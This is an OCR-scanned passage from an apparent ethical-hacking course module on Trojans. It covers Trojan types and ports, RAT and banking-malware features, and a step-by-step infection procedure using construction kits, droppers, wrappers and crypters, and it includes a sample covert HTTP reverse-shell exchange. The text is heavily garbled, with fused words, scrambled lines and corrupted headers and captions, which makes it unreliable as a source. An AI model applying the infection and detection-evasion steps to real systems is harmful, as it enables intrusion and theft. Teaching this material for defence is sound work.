FELIXROOT,
TYPEFRAME
1011 DolyTrojan 8787/54321BackOfrice
2000
1170 Psyber
StreamServer,
Voice 10100 itt
1234/
12345
1243
Valvo line
SubSeven10-1.8
11223
12223,
Progenic
Trojan
Hack’99
KeyLogger
1243/6711
16776/273SubSeven 12345-46 GabanBus,
NetBus
â„¢
wm Agent.BTZ/ComRat,
JavaRAT, Adwind 16969 Priority
RAT
1492 Frp9acme
NetBus
2034/1120 NetBus 2.0,
2.01,
Beta
ical andCountermensores
Mackin ©by E-Comel
Copyright
1600 Shivka-Burka 22222/ Prosiak
33333
1608 HeliSpy
DarkCometRAT,PandoraRAT,
22222 Rux
Rae
1999
Shockrave
BackDoor1.00-1.03,
25685
26274
‘Moon
Delta
Pie
2001 Trojan
Cow 30100-02 NetSphere
1.27a
31666
‘NetSpy
Dk
80Whack
2801 Phineas
Phucker 34324 BigGluck,
TN
3131
Subsari 4082126 MastersParadise
3150
3389
The
ROP
Invasor 4762
50766
betta
Fore
3700/9872- RemoteWindows
9875/1006Portalof Doom Shutdown
7/0167
4000 RA .69-1.11/
SchoolBus
4567
4590
File Nail
Icatrojan
Telecommando
Devil
5000 Bubbel,
SpyGate
RAT,PunisherRAT
Table72:
Trojan
andcorresponding
ical
port ofstack
andCountermensores
Mackin ©by E-Comel
Copyright
of Trojans
Types
1@Trojansae
categories
according
to thelrfunctioning
andtargets
(©Some
ofthe
example
includes:
Eh tects
ccs Td
ans rene jas
Software
Security
Se sete
of Trojans
‘Types
Trojan
are classified depending
into many categories o n the exploit
functionality
targets.Some
Trojans
types a re listedbelow:
1. RemoteAccess Trojans
Backdoor Trojans
Botnet Trojans
RootkitTrojans
E-BankingTrojans
Trojans
Point-of-Sale
Defacement Trojans
ServiceProtocolTrojans
MobileTrojans
loTTrojans
Software
Security Trojans
Disabler
Trojans
Destructive
DDoSAttackTrojans
Command ShellTrojans
ical andCountermensores
Mackin ©by E-Comel
Copyright
Trojans
RemoteAccess
Remoteaccess Trojans(RATs)
provide attackerswith full control over the victim’s
system,
thereby
enabling themto remotely
access files,private
conversations, accounting data,etc. The
RATacts as a server and listenson a port that is not supposed to be availableto Internet
Therefore,
attackers. if the user is behinda firewallon the network,
attackerwill connect to the Trojan.
can easily
access Trojans.
Attackers
its less
likely
thata remote
in the same networklocatedbehindthe firewall
Ain (comple
@ @
Sitting Russfabecca
Jasonattacker
acento
the
syatamVictim
with
RAT
2 sear gi n 109%
fected
7.3:Working
Figure ofRemote
Access
Trojan
Trojan
Attackersuse RATsto infectthe targetmachineto gain administrativeaccess. RATshelpan
attackerto remotely access the completeGUI andcontrolthe victim’s
computer withouthisor
her awareness. Moreover, theycan perform s creen andcamera capture, codeexecution,
keylogging,file access,password sniffing,
registrymanagement, and so on. Theyinfectvictims
Via phishingattacksanddrive-by andthey
downloads, propagatethrough infectedUSBkeys or
networked drives. Theycan download and execute additional malware, execute shell
commands, readandwrite registrykeys,capturescreenshots, logkeystrokes, and spy on
webcams.
=
njRaT
a
njRAT
is
it can
powerful
access a
data-stealing
RATwith
downloadingperforming
files,
capabilities.
to
In addition logging
keystrokes,
credentialsstoredi n browsers,
victim'scamera, stealing
process and file manipulations,
uploadingand
andviewingthevictim's
desktop,
ThisRATcan be usedto controlbotnets(networks of computers),thereby allowing
the
attackerto update,uninstall,
disconnect, restart,and closethe RAT,and rename its
campaign ID. The attackercan further create and configure the malwareto spread
throughUSBdrives withthehelp of thecommand-and-control server software.
Features:
© Remotely
access
the victim’s
computer
Collectvictim'sinformationsuchas IP address,
hostname,
andOS.
Manipulate
filesandsystemfiles
ical andCountermensores
Mackin ©by E-Comel
Copyright
Open
a nactive theattacker
remote sessionproviding accessto thecommand
lineof
the victim'smachine
>
Logkeystrokes
andstealcredentialsfrombrowsers,
74: ScreenshotofniRAT
Figure
Someadditional a re as follows:
RATS
=
FlawedAmmyy
=
MoSucker
=
ProRat
=
Theet
=
Ismdoor
=
KediRAT
PCRat/
GhOst
=
Backdoor Trojans
RAT
‘A bypass
backdoor
is a programthat can thestandardsystemauthenticationor conventional
systemmechanisms suchas IDSand firewalls, without beingdetected.In these typesof
breaches, leverage
hackers backdoorprogramsto accessthevictim’s
computeror network.The
differencebetweenthis typeof malwareandother typesof malwareis that the installationof,
the backdooris performed knowledge.
withoutthe user’s Thisallowsthe attackerto perform
any activityon the infected computer,suchas transferring, modifying, or corrupting files,
installing
malicioussoftware, and rebootingthe machine,without user detection.Backdoors
are usedbyattackersfor uninterrupted
accessto the targetmachine,Mostbackdoors a re used
for targetedattacks.BackdoorTrojans are often usedto group victim computers to form a
botnetor zombienetworkthat can beusedto perform criminalactivities.
BackdoorTrojans
are often initially
usedi n the second(point
of entry)or third (command-and-
stageof the targeted
control[C&C]) attackprocess.Themain differencebetweena RAT anda
ical andCountermensores
Mackin ©by E-Comel
Copyright
traditionalbackdoor
is that the RAThasa user interface,
i.e. the clientcomponent,
whichcan
be used by the attacker to issue commandsto the server component residing
i n the
compromised machine, whereas a backdoordoesnot
Forexample,
network.Thehackerimplants
the backdoor
is
a hackerwho performing a malicious
identifies
activity
vulnerabilitie
a
the networkmonitor.exebackdoori n the target
will be installedin a victim’s
in target
network,
machineon the targetnetworkwithout being
and
A registry
can
Somevariants of Poisonivycopy themselves
into an alternatedatastream:
entryof the backdoorwill be addedto ensure that the backdooris started
every time the computer is bootedup. The server then connectsto a client usingan
addressdefinedwhenthe server partwas created.Thecommunication betweenthe
server andclientprograms i s encrypted
andcompressed. can beconfigured
Poisonlvy to
injectitself into a browserprocess before making connection to bypass
an outgoing
firewalls
Features:
© Filemodification,
deletion,
andtransferto andfromthe infectedsystem
Windowsregistry
can beviewedandedited
ical andCountermensores
Mackin ©by E-Comel
Copyright
Fire 75:Serenshtof Potsony
+
POWERSTATS
ExtraPulsar
va
=
RogueRobin
+
Servielper
linux
+
SpeakUp backdoor
backdoor
+
Winnti
Botnet
Today,
Trojans
most majorinformation securityattacksinvolvebotnets.Attackers (also
knownas “bot
herders―)
use botnet Trojans to infect a largenumberof computers throughout
a large
geographical
area to create a networkof bots(ora “botherd―)
that can achieve
controlvia a
command-and-control (C&C) center. They trick regular
computerusers into downloading
Trojan-infected through
filesto theirsystems phishing,
SEOhacking,
URLredirection,
etc. Once
the user downloadsand executes this botnet Trojan i n the system, it connects backto the
attackerusingIRC channelsandwaits for further instructions,Some botnetTrojans alsohave
worm featuresandautomaticallyspread to other systems in the network.They helpan attacker
to launchvarious attacksandperform nefariousactivities suchas DoSattacks, spamming, click
fraud,
and
theft ofapplication
serialnumbers,
IDs,
login and
credit cardnumbers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure76: ofGotnet
Functioning
Necurs
TheNecursbotnet is a distributorof many piecesof malware, most notably Dridexand
Locky. It deliverssome oftheworst bankingTrojansandransomware threatsi n batches
of millionsof emailsat a time, and it keeps itself.Necursis distributedby
reinventing
spame-mailsanddownloadablecontent from questionable/illegal sites. It is indirectly
responsible
Features:
a
for significant
portionof cyber-crime.
>
Destruction of the system
© a PCinto a spyingtool
Turning
©
money
theft
Electronic
and
Botnet mining
Serving
as a gateway for otherviruses
Necurs Botnet -
Email
Spam
Figure77:Screenshot
showing
Necus
spam
for2
ical
email
Mackin
wicking victim
=
n
Hide Seek
Ramnit
=
Panda
=
BetaBot
=
Cridex
RootkitTrojans
As the name indicates, “rootkit―
consists of two terms,i.e., “root―
and “kit.―
“Root―
is a
UNIX/Linuxterm that is the equivalent of “administrator―
i n Windows. Theword “kit―
denotes
programsthat allowsomeone to obtainroot-/admin-level accessto the computer byexecuting
the programsi n the kit. Rootkitsare potent backdoorsthat specificallyattackthe root or OS.
Unlike backdoors, rootkits cannot be detected byobserving services, systemtask lists,or
registries. Rootkitsprovide full control of the victim OS to the attacker.Rootkitscannot
propagate bythemselves, and thisfact hasprecipitated a greatdealof confusion. In reality,
rootkits are just one componentof what is calleda blendedthreat. Blendedthreatstypically
consistof three snippets of code:dropper, loader, androotkit.Thedropper is the executable
the dropper
programor file that installsthe rootkit. Activating programusually entailshuman
intervention,suchas clicking on a maliciouse-maillink, Onceinitiated,
the dropper launches
the loaderprogram and then deletesitself.Onceactive,the loadertypically causes a buffer
overflow,whichloadsthe rootkit into memory.
=
EquationDrug Rootkit
EquationDrug
is a dangerous rootkit that attacksthe Windowsplatform.
computer It
performs targetedattacksagainstvarious organizations
andlandson the infected
systembybeingdownloadedand executedbythe Tricklerdubbed"DoubleFantasy,"
coveredbyTSL20110614-01(Trojan.Win32.Micstus.A).
It allowsa remote attacker
to
execute shellcommandson theinfectedsystem,
ical andCountermensores
Mackin ©by E-Comel
Copyright
orvterath
ye Leverem
a)
tne
Someadditionalrootkit Trojans
are as
showing
gure78 Screenshot start of
follows: EquationDrug
Rootkit
+
cEIDPagetock
+
Wingbird
+
GrayFish
+
Finfisher
+
ZeroAccess
+
Whistler
E-banking Trojans
E-banking Trojans are extremely dangerous andhaveemerged as a significant
threat to online
banking. They interceptthe victim'saccount informationbeforethe system can encrypt it and
sendit to the attacker'scommand-and-control center. Installationof theseTrojanstakesplace
on the victim'scomputer whenhe or sheclicksa maliciousemailattachmentor a malicious
advertisement. AttackersprogramtheseTrojans to steal minimum and maximum monetary
amounts,so that theydo not withdrawall the money i n the account, thereby avoiding
suspicion. TheseTrojans also create screenshots of the bankaccount statement,s o that the
victim thinksthat there is no variation i n his/her
bankbalanceand is not aware of this fraud
unlesshe/she checks the balancefromanothersystem or an ATM,TheseTrojansmayalsosteal
ical andCountermensores
Mackin ©by E-Comel
Copyright
victims’
data suchas creditcard numbersandbilling
details,
and transmit them to remote
hackersv ia email,FTP,
IRC,
or othermethods,
o>
of
WorkingE-banking Trojans
Figure
79:Working
€
of Banking
Tojan
Theworking
of
aboutusers online banking
of a banking
andpayment
Trojan
includes
t
systems.
he following:
‘+
TAN Gabber:A Transaction AuthenticationNumber(TAN) is a single-use
password for
authenticating
online banking transactions. Banking
Trojans interceptvalid TANS
enteredbyusers and replace
themwith randomnumbers.The bankwill reject
such
invalid randomnumbers. Subsequently,
the attacker
misusesthe intercepted
TANwith
the target's
login
details
HTML Injection:The Trojan creates fake form fields on e-banking pages,thereby
enabling
account
details,
the attackerto collectthe target’s creditcardnumber,
birth,etc. The attacker can use this informationto impersonate
compromise his/her
account.
dateof
the targetand
ical andCountermensores
Mackin ©by E-Comel
Copyright
methodsusedbybanking
‘Some to stealusers’
Trojans information
are as follows:
© Keylogging
Formdatacapture
fraudulentformfields
Inserting
andvideorecording,
Screencaptures
financial
Mimicking websites
© Redirecting
to banking
websites
© Man-in-the-middle
attack
E-banking Dreambot
Trojan:
banking
Dreambot are alsoknown as updated
Trojans versions of Ursnifor Gozi
DreambotTrojans have longbeen used byhackers, and theyhave been regularly
updated
withmore sophisticated capabilities.
They can be deliveredthrough the Emotet
document
machine,
or
dropper RIGexploit kit. ThisTrojan
it will covertly
can alsobeembedded
keys
create registry and processes,
as a macro i n an MSword
andsent to victims via spamemails.if this Trojan getsinto the victim's
and attemptto connect to
multiple
maliciousC2Cservers.
720: HTTPS
Figure to maicous servers
requests
to the C2Cserver, it will perform
Afterconnecting keylogging
andsendthe keylog
data
to the attacker.This keylog
data can include passwords
of banking
websites,
OTP
messages,
secure
transaction passwords, pins,etc.
Modul
7 875
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
File EditSearchView Encoding
Language
Settings
MacroRun Plugins
Window?
a
688 oa)
13[a 4/4
Torose7eoseeeseseon
05-2018 13241322
4G 1 KOBE
2\PE xplore.ex
Blank
relatedwith the
Program
keylogs
pad++.¢
e-banking
Someadditional
7.1;
Figure Screenshotof reambot
are follows:
Trojans
as
Banking
Trojan
—keylog
data
+
Emotet
+
PandaBanker
+
Ramnit
+
zeus
+
Dridex
+
UrizoneBanker
Trojans
Point-of-Sale
As the name indicates, point-of-sale
(POS)
Trojansare a typeof financialfraudulentmalware
that targetPOSand payment equipmentsuchas creditcard/debitcardreaders.Attackers use
POSTrojans to compromise suchPOSequipment and grabsensitive informationregarding
credit cards, suchas creditcardnumber, holdername, andCW number. SincePOSplays a
criticalrole in the retail industry,
theseTrojans
will havea greaterimpacto n retail businesses
andretailcustomers.Themagnetic namely
stripeon a creditcardconsistsoftwo tracks, called
TRACK1 Theseare criticalfor completing
and TRACK2. the transaction usinga POSdevice.
Track andTrack2comprisecriticalinformation
relatedto the creditcard. Once a POSTrojan
ical andCountermensores
Mackin ©by E-Comel
Copyright
affects andcompromises a POS device, to grab
it attempts theTRACK1 andTRACK2 information
he/she
of the cardthat is insertedi n the device.Oncethe attackeracquires this information,
fullcontrolofthecardandcan easily
‘gets performfinancial
fraud,
=
GlitchPos
popularly
It is knownas GlitchPOS.A. GlitchPOS
is a fake cat game that is embeddedi n
malwarenot execution.
and displayed
as
a
at the time of
cat game. Whenany victim installsthe cat game, the Trojan
background. by grab
GlitchPOS
is used attackers
to
thatmasquerades
It is a Trojan
will be executedi n the
thecreditcardinformation
of the
has becomethe most notorious financialTrojan,
victim, GlitchPOS and its adverse
effectshave spreadacross the globe.
To stealthe creditcardinformation,
this Trojan
searches
for theTrack1andTrack2detailsin the memorypagesof devices.
=
®
Blaves
rate
3 newgiene
Lond ResourcesViewer
hd
@
=
in
oat
id oxme
B Gamera
rePath 009)
ath
reP 5939
BBGameaehfessot
GamePath
fre LEE
Game?
ath
GamePath
26FOA
2792
BBGamera rc9ct
BhGamersen
BE
GameP
tree
a fre39090
BBGamera 00%
1 eat
BBGameahtoestc2
HAGamePath foes
sas
figure 7.2:Screenshot
of Trojan
GtchPOS
SomeadditionalPOSTrojans
are as follows:
+
LockPos
+
BlackPos
+
Fastpos
PunkeyPOS
CenterPos
MalumPos
Module
7 877
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Defacement
Trojans
DefacementTrojans,once spread can destroy
over the system, or changethe entire content of
a database.However, theyare more dangerous when attackerstargetwebsites, as they
physically
changethe underlyingHTMLformat, resultingin the modificationof content. In
significant
addition, lossesmay be incurreddue to the defacementof e-business targets by
Trojans.
editorsallowone to view, edit,extract,
Resource and replace bitmaps,
strings, logos, andicons
fromanyWindows program.They allowviewingandeditingof nearly of a compiled
any aspect
Windowsprogram,frommenus to dialog
boxesand icons,etc. They
employ
user-styled
custom
(UCAs)
applications to
deface
Windows
applications.
Standard
s
2
Originalc okexe
cae
one Detaced
Restorator
Figuce showing
733Screenshot
defaced aplestin
alex
Source:http://www.bome.com
Restoratoris a utilityfor editingWindowsresources i n applications and their
components (e.g,fileswith .exe, .dll,.res, .rc,and .derextensions).
It allowsyou to
add,or remove resources suchas text, images,icons,sounds,
change, videos, versions,
dialogs,
and menus i n nearlyall programs. Usingthis tool, one can achieve
translation/localization, design
customization, improvement,anddevelopment.
Features:
applications
Translateexisting (localization)
Customize
thelookandfeelof programs
Replace
logos
andicons (branding)
controlover
Enhance resource filesi n development
thesoftware process
ofapplications
Hackinto the inner workings on the computer
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure showing
714:Screenshot Rest
ServiceProtocolTrojans
‘These
Trojanscan take advantageof vulnerableservice protocols
suchas VNC,HTTP/HTTPS,
andICMP,to attackthevictim'smachine.
=
VNCTrojans
VNCTrojan
‘A starts a VNCserver daemoni n the infectedsystem (victim),whereby the
attackerconnects to the victim usingany VNC viewer. Sincethe VNC programis
considereda utility,thisTrojan
will bedifficult to detectusingantivirus software.Well
knownfinancialmalware
suchas Dridex,
Neverquest,andGoziemploy a hiddenvirtual
networkcomputing(HVNC)module,whichallowsattackersto gain user-grade
access to
an infected
PC.
Vietim
Figure7.25:
Working
of VNCTrojan
ical andCountermensores
Mackin ©by E-Comel
Copyright
HTTP/HTTPS
Trojans
HTTP/HTTPS
Trojans can bypassany firewall and work in reverse, as opposed to a
straight
HTTP tunnel. They
use web-based interfacesand port 80. The execution of
these Trojans takes placeon the internal host and spawnsa child programat a
predetermined time. Thechild programis a user to the firewall; hence, the firewall
allowsthe programto accessthe Internet.However, thischildprogramexecutesa local
shell,connects to the webserverthat the attackerowns on the Internet through an
apparently legitimate HTTPrequest,andsendsit a readysignal. The apparently
legitimateanswer fromthe attacker'sweb server is, i n fact,a series of commands that
thechildcan execute on themachine’s
localshell,Theattacker
converts all thetraffic
into a Base64-like
structure andgives it as a valuefor a cgi-stringto avoiddetection.
Thefollowing
is an example
of a connection:
Slave:GET/cgi-bin/order?
MSmAe}TgZdgYOdgIO0BqFFVYTg}FLdgxEdbive7kr} HTTP/1.0
Masterreplies with: g5mAlfbknz
TheGETof the internalhost(SLAVE) is the command promptof the shell;theanswer is
an encoded “1s―
commandfromthe attacker on the external server (MASTER). The
SLAVE
spawned
tries to connect to the MASTER
if the shellhangs; at
daily a specified time. If necessary,the childis
the attackercan checkand fix it the next day.If the
administratorsees connectionsto theattacker'sserver andconnectsit to his/her server,
he/she justsees a brokenweb server because thereis a token(password) i n the
encodedcgi GETrequest. Support for W W Wproxies(e.g., Squid, a fullyfeaturedweb
proxy cache) is available.The programmasksits name i n the processlisting. The
are
programs reasonably
per file. Usage
slave―
on the SLAVE,
small;the master andslave
is easy:edit rwwwshell.pl
and run “rwwwshell.pl―
programs
on the MASTER
consistof only260lines
for the correct values, execute “rwwwshell.pl
just beforethe slavetries
to connect.
HTTPrequest
to
Trojanpassesthrough
HTTPreply
716: Working
Figure of HTP Trojan
0 SHTTPD
SHTTPD i s a smallHTTP server thatcan beembedded insideanyprogram.It can be
wrapped with a genuine program(game chess.exe).
Whenexecuted,i t will turn 2
computer into an invisiblewebserver. Forinstance,an attackerconnects to the
victim usingwebbrowserhttp://10.0.0.5:443 andinfectsthevictim’s
computer with
cchess.exe, with Shttpdrunningi n the background
andlistening 443 (SSL).
on port
ical andCountermensores
Mackin ©by E-Comel
Copyright
2
attacker
Normally
Firewall
you
throu
port
1: 10.0.05:483
a
allows
7.7: SHTTPD
Figure
=)
rented
rote
attackprocess
tateTt victim
1p:10.0.0.8:443
o HTTPRAT
HTTP RAT uses web interfacesand port 80 to gain access. It can be understood
simply
are
as an HTTPtunnel,
comparatively
more dangerous
Internetcan beaccessed,
as theywork nearly
ubiquitously
wherethe These
exceptthat it worksi n the reverse direction. Trojans
Features
(© Displays data/keystrokes,
adsandrecordspersonal
unsolicitedfilesanddisablesprograms/system
Downloads
FloodsInternet connection anddistributes
threats
Tracksbrowsing
activities andhijacks
Internetbrowser.
Makesfraudulentclaimsaboutspywaredetectionandremoval
ICMPTrojans
7.18:
Figure
of TP RAT
Working Troan
ical andCountermensores
Mackin ©by E-Comel
Copyright
attackercan hidethe data usingcovert channels
‘An methodsi n a protocol that is
undetectable.Theconceptof ICMPtunneling allowsone protocol to be carriedover
anotherprotocol. ICMPtunneling uses ICMPechorequest andreplyto carrya payload
andstealthily
access or controlthe victim’s
machine.Attackerscan use the dataportion
of ICMP_ECHO and ICMP_ECHOREPLY packets for arbitrary informationtunneling,
Networklayer devicesandproxy-based firewallsdo not filter or inspectthe contents of
making
traffic,
ICMP_ECHO theuse ofthischannel
attractive to hackers.
Attackerssimplypass,drop,
or return the ICMPpackets.TheTrojan themselves
packets
masquerade as common ICMP_ECHO traffic.The packets
can encapsulate
(tunnel)
any
required
information.
owe
cont ICMP
Trojan:
fempsendHOME
Server
comme
lg
Mobile Trojans
Figure
719:Working
of CMP
Trojan
Mobile Trojans are malicioussoftwarethat targetmobilephones. Mobile Trojanattacksare
increasingrapidly due to the global proliferation
of mobile phones.The attackertricksthe
victim into installing
the maliciousapplication.
Whenthe victim downloadsthe maliciousapp,
the Trojan performsvarious attackssuchas banking credentialstealing,
socialnetworking
credentialstealing,
dataencryption, anddevicelocking,
+
BasBanke
BasBanke is a Trojanfamilythat runs on Android.TheTrojan was firstidentified i n 2018
during over 10,000
the Brazilianelections,registering installationsas of April2019from
theofficialGoogle
will perform
card andfinancial
Storebanking a
Play alone.Itis a
keystrokelogging,screen recording,
andwhenit infectsdevice,
Trojan,
SMSinterception,
information.To trick users into downloading
it
and theft of credit
thisTrojan, the Trojan
creators advertisedit via WhatsApp and Facebookmessages. Themost widely spread
and downloadedmaliciousversion of BasBankeis the fake CleanDroid
Android app.
CleanDroid itselfas a mobilejunkcleaning
projects andmemoryboosting app;however,
itis actually
a banking
Trojan.
ical andCountermensores
Mackin ©by E-Comel
Copyright
= Cleandroid
Gio pen
Figure720:Screenshot
ofBasBanke
MobileTrojan
SomeadditionalmobileTrojans follows:
are as
Smith
Agent
Hiddad
AndroRAT
Rotexy
Gplayed
Asacub
Gustuff
Trojans
WoT
Internetof things
items embedded
Trojans
‘These
(IoT)refersto the inter-networking
with electronics.
leverage
loT Trojans of
physicaldevices,
are malicious programs
a botnetto attackothermachines
buildings,
outsidetheloTnetwork.
andother
that attackloT networks.
Mirai
Mirai is a self-propagating loT botnetthat infectspoorly protectedInternet devices(loT
devices). Mirai uses telnet port (23or 2323) to findthosedevicesthat are still using
thelr factory default username and password. Most loT devicesuse defaultusernames
and passwords. Mirai can infectsuchinsecure devices(bots) and co-ordinate them to
mount a DDoS
attackagainst
a chosen
victim.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Feature
Login attemptswith60differentfactory
defaultusernameandpassword
pairs
© Builtfor multiple
CPUarchitectures(x86,
ARM, Sparc,PowerPC,
Motorola)
>
Connects
to attacker
specify
attack
to C&C allowthe
bandwidth
Increases usageforinfected
bots
to an vector
Identifiesandremoves competing
malware
© Blocksremote administrationports
sed MDby
Prevention:
ure 7.21:
Screenshot
displaying MialD oS atack
botnetTrojan
+
SilexBrickerBot
+
Satori
+
Toriibotnet
MioriloT Botnet
Bashlitelot Malware
Gafgy
Botnet
7
Module Page804 tical andCountermensores
Making by Comet
Copyright©
SecuritySoftware DisablerTrojans
SecuritysoftwaredisablerTrojans stopthe working programssuchas firewalls,
of security and
IDS,either bydisablingthem or killingthe processes. Theseare entryTrojans,
whichallow an
to
attacker perform
Somesecurity
of
the next level attack on the targetsystem,
softwaredisablerTrojans are as follows:
=
Certlock
+
GhostHook
*
Trojan.Disabler
DestructiveTrojans
Thesolepurpose of a destructiveTrojan
is to deletefiles o n a targetsystem.Antivirussoftware
maynot detectdestructiveTrojans. Oncea destructive Trojan infectsa computer system, it
randomly deletesfiles,folders,
and registryentries as well as localandnetworkdrives, often
resulting
in OSfailure.
ical andCountermensores
Mackin ©by E-Comel
Copyright
control (C&C) server fromwhich it downloadsa configuration
file containing
a rangeof IP
addressesto attemptauthenticationover severalports.Alongwith the infected botnet
zombies, it performs DDoSattacksin whicha zombiefloodsa targetserver/machinewith
malicioustraffic.
Command
ShellTrojans
A command shellTrojan provides remote controlof a command shello n a victim'smachine.A
Trojanserver is installedon the victim'smachine,whichopens a port,allowing the attackerto
connect. Theclient is installedon theattacker'smachine, whichis usedto launcha command
shellon the victim's machine.Netcat,DNSMessenger, GCata re some of the latestcommand
shellTrojans,
Figure ofCommand
7.22:Working ShellTrojan
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Infect Systems
Using
a Trojan
6
STEPbelo the Tan on thew chine Wy
eestingdapper
e
! 2m
How to Infect Systems Using a Trojan
attacker remotely
‘An can controlthe system hardwareandsoftwarebyinstalling
a Trojanon.
the system. OncetheTrojan is installed thedatabecome
o n the system, vulnerable
to threats.
In addition,
the attackerc an perform attackson third-party
systems.
AttackersdeliverTrojans i n manyways to infecttarget systems:
Trojans are includedi n bundledsharewareor downloadablesoftware.Whenusers
downloadsuchfiles,the targetsystems
automatically
installthe Trojans.
Differentpop-up
regardless ads try to trick users. They
are programmed
ofwhetheru sers clickYESor NO,a download
will begin
bythe attackersuchthat
will
andthe Trojan
‘automatically
on
installitself the system.
Attackerssendthe Trojansas emailattachments.Whenusers open thesemalicious
attachments,
the Trojans
are automatically
installed.
Usersa re sometimestemptedto clickon differenttypesof files,suchas greeting cards,
porn videos,andimages,whichmight Clicking
contain Trojans. on thesefilesinstallsthe
Trojans,
Attackersinfecta targetmachineusing a Trojan
i n the following
steps:
=
Step1: Create a new Trojanpacket using various tools such as TrojanHorse
Construction Toolkit(SET),
kit,SocialEngineering andBeast.NewTrojans havea higher
chanceof succeeding the target
i n compromising system, as the securitymechanisms
mightfail to detectthem.TheseTrojans can be transferred to thevictim'smachine
using
dropper
a or downloader.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Step2: Employ or a downloaderto installthe maliciouscodeon the target
a dropper
system. appears to users as a legitimate
Thedropper application
or a well-knownand
trustedfile.However, whenit is run, it extracts the malwarecomponents hiddeni n it
and executes them,usually without saving them to the disk, to avoid detection
Droppers
decoy
include images,games,or benign
to divert users’
transporters
messages i n theirpackages,
attention from maliciousactivities. Downloaders
thatdo not contain theactualmalware file;however,
which
serve
as
a
a re malware
theycontain thelink
fromwherethe actualTrojan can be downloaded. Whena downloaderis executedon
the targetmachine, it connectsback to the attacker's server and downloads the
intendedTrojan machine.Droppers
on the victim’s can easily evadefirewalls; however,
a downloader
Step3: Employ
c an bedetectedwith the help
a wrappersuchas petite.exe,
of network
analyzer
tools.
Graffiti.exe,
IExpress Wizard,or EliteWrap
to help bindthe Trojan executableto legitimate filesto installit on the target system.
Step 4: Employ a crypter suchas BitCrypter to encrypt the Trojan to evadedetectionby
firewalls/IDS,
Step5: Propagate the Trojan byimplementing various methodssuchas sending it via
overt andcovert channels, exploit kits,emails, and instant messengers, thereby tricking
users into downloading and executing i t. An active Trojan c an perform malicious
activities suchas irritatingusers with constant pop-ups, changing desktops,changing or
deleting files,
stealingdata,andcreating backdoors.
Step6: Deploy the Trojan on the victim’s machinebyexecuting the dropper or
downloadersoftware to disguise it. Thedeployed filecontains wrapped and encrypted
malware.
Step7: Executethe damage routine. Most malwarecontain a damageroutine that
deliverspayloads.Some payloadsjustdisplay whereasotherscan
imagesor messages,
even deletefiles,
reformatharddrives, or cause other damage.
Thedamageroutine can
alsoincludemalwarebeaconing.
Figure7.23
Diagram thecomplete
showing proces involved targetm achine
i n infecting usingTrojan
ical andCountermensores
Mackin ©by E-Comel
Copyright
Creating
a Trojan
|@
Trojan
Horse
Kits
hepto
construction attackers
horsesoftheir choice
constructTrojan
Darkiforse TrojanVirusMaker
in |
|©Thetoos these
Deck
k tscanbedangerous
not properlynmcuted
andcan
byselectingfrom
creates
various
options
Oavlorse Troanvirus maker user-specified
Trojans
‘Trojan
HorseConstructionKits
Io
Creating
a Trojan
Attackers
can create Trojans horseconstruction kitssuchas DarkHorse
usingvarious Trojan
Trojan
Virus Maker,
andSennaSpy Trojan Generator.
Trojan
Horse ConstructionK it
Trojan
horse construction kits helpattackersconstruct Trojan
horsesand customize them
according
to their needs.Thesetools are dangerous
andcan backfireif not properly
executed
New Trojans createdby attackersr emain undetectedwhen scannedby virus- or Trojan-
scanningtools,as they
do not matchanyknownsignatures.Thisaddedbenefitallowsattackers
to succeed
=
in
launching
attacks.
Trojan
DarkHorse VirusMaker
DarkHorse Virus Makeris usedto create user-specified
Trojan via selection
Trojans from
ofavailable
a variety TheTrojans
options. are created to theseselected
to act according
options.Forexample, if you choosethe optionDisableProcess,
the Trojan
disablesall
processeson thetargetsystem. Thefigurebelowshowsa snapshot
ofDarkHorseTrojan
VirusMakerwith its various availableoptions.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DarkHorseTrojan
Virus
Maker 1.2
SomeadditionalTrojan
7.2: Screenshot
Figure of Dartorse
horse construction kitsare as follows
Vius
Trojan Maker
©
Trojan
HorseConstruction
Kit
Senna SpyTrojan
Generator
+
=
Batch
Trojan
G enerator
UmbraLoader Botnet Trojan
-
Maker
ical andCountermensores
Mackin ©by E-Comel
Copyright
Employing or Downloader
a Dropper
Droppers Downloaders
ie the
Dropperused
t o camouflagemalware
the targeted
{©Downloaders
a programthatcan download
does
not
cary
malware
itself
systems
(©Downloader
Dropper
consists ae
dropper
Undetectable
Installation
does,
there
posi
afone ar more
byantvis software;
typesof
alsthe
processcan bedonestealthy
s
theantimalware
scanner
the for
‘ostDownloader
andTojan.Downoader
oftheames
Some
droppers
fordeploying
temple
hat attackers
matware to thetarget
stackeremployfr deploying
the targetmachine
malwareto
Employing or Downloader
a Dropper
their intendedTrojans,
After constructing attackerscan employ
a dropper
or a downloaderto
transmit theTrojan
package to the victim’s
machine.
Droppers
are system.malware
Droppers programsthat are used to camouflage
functioning of the target The dropper
payloadsthat can impede
consists of one or more
malwarefeaturesthat can make it undetectableby antivirus software;
the
types of
moreover, the
installationprocess can be stealthily
performed.
Thedropper is executedbysimply loadingits own code into the memory,andthe malware
payload is then extractedand written into the file system. Next,the malwareinstallation
process andthepayload
i s initiated, is executed,
Emotetand Dridexa re well-known droppers that attackersemployfor deploying malwareon
the targetmachine.
Downloaders
downloaderis
‘A a programthat can downloadand installharmfulprogramssuchas
malware.Downloadersare similar to droppers to a certain extent. However, the main
difference
is thata downloader
is possible
doesnot carrymalware whereas
for a new unknowndownloaderto passthrough itself does;
a dropper
the anti-malwarescanner.
hence,it
Attackersuse downloaders
as partof the payloadotherharmfulprogramsthat can dropand
or
stealthily
installthe malware.Downloaders as camouflaged
are spread filesattachedin emails,
and the attachedprograms pose as legitimate
programs suchas accounts.exe or invoices.
ical andCountermensores
Mackin ©by E-Comel
Copyright
server for directlydownloader
Whenthe victim opensthe attached
fetching
infected
file,the
othermaliciousprograms.
tries to contact the remote
Godzilla
--W97M.Downloaderlgen36,
_—Trojan.Downloader,
downloader,
|SB,.Downloaderlgen277
and
are some well-known downloadersthat attackersemployfor
deploying
malware
machine,
on the target
ical andCountermensores
Mackin ©by E-Comel
Copyright
Employing
a Wrapper
‘wrapper
Tolan
eecutable
genuine
binds wth ookngXEapa
he
and
hen
acgroundthe
user uns the wrapped, is installs Tan inthe
thenuns he wrepengaptestion
senda birthday
Atacher might t at
greeting
